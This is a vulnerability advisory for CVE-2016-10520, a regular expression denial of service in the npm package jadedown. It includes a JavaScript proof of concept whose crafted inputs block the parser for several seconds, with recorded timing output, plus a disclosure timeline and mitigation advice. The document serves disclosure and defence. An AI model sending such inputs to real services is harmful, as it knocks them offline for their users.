CVE-2016-10520
Regular Expression Denial of Service in jadedown
Description
The `jadedown` package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in.

### Proof of concept

```js
var jadedown = require('jadedown');

// Build a string of len + 1 copies of chr. The counter `i` is not declared
// with `var`, so it is a global shared with the outer loop below; this is why
// COUNT in the recorded output advances by three per iteration and the second
// genstr() call receives a larger length than the first.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Feed progressively longer inputs to the template parser and time each call.
for (i = 1; i <= 10000000; i = i + 1) {
  console.log("COUNT: " + i);
  var str = genstr(i, 'f') + genstr(i, '#') + '{';
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  jadedown(str);
  var end = process.hrtime(start);
  console.log(end); // [seconds, nanoseconds] elapsed
}
```

Results demonstrating blocking for 5 seconds using only 48 characters:

```
$ node jadedown.js
COUNT: 1
LENGTH: 6
[ 0, 4014065 ]
COUNT: 4
LENGTH: 12
[ 0, 503507 ]
COUNT: 7
LENGTH: 18
[ 0, 325225 ]
COUNT: 10
LENGTH: 24
[ 0, 1632684 ]
COUNT: 13
LENGTH: 30
[ 0, 7541230 ]
COUNT: 16
LENGTH: 36
[ 0, 80889495 ]
COUNT: 19
LENGTH: 42
[ 0, 636009936 ]
COUNT: 22
LENGTH: 48
[ 5, 820586760 ]
```

# Timeline

- October 24, 2015 - Vulnerability Identified
- October 24, 2015 - Maintainers Notified
- October 25, 2015 - Response from Maintainers with intent to fix
- January 5, 2016 - Advisory Published
- January 11, 2016 - CVE Requested

## Recommendation

This package is not actively maintained, and has not seen an update since 2011. The package also provides unique functionality in the form of a templating language that is not available elsewhere. If this package is used to process user input, the best available mitigation is to refactor the dependent application to not make use of this module.
How to fix CVE-2016-10520
No patched version has been released. Consider removing the affected package, or refer to the upstream recommendation referenced below.
- No patched version listed
Is CVE-2016-10520 being exploited?
Low: EPSS is 0.3%, and no widespread exploitation activity has been observed.
Affected packages (1)
- `jadedown`: from 0, <= 0.0.3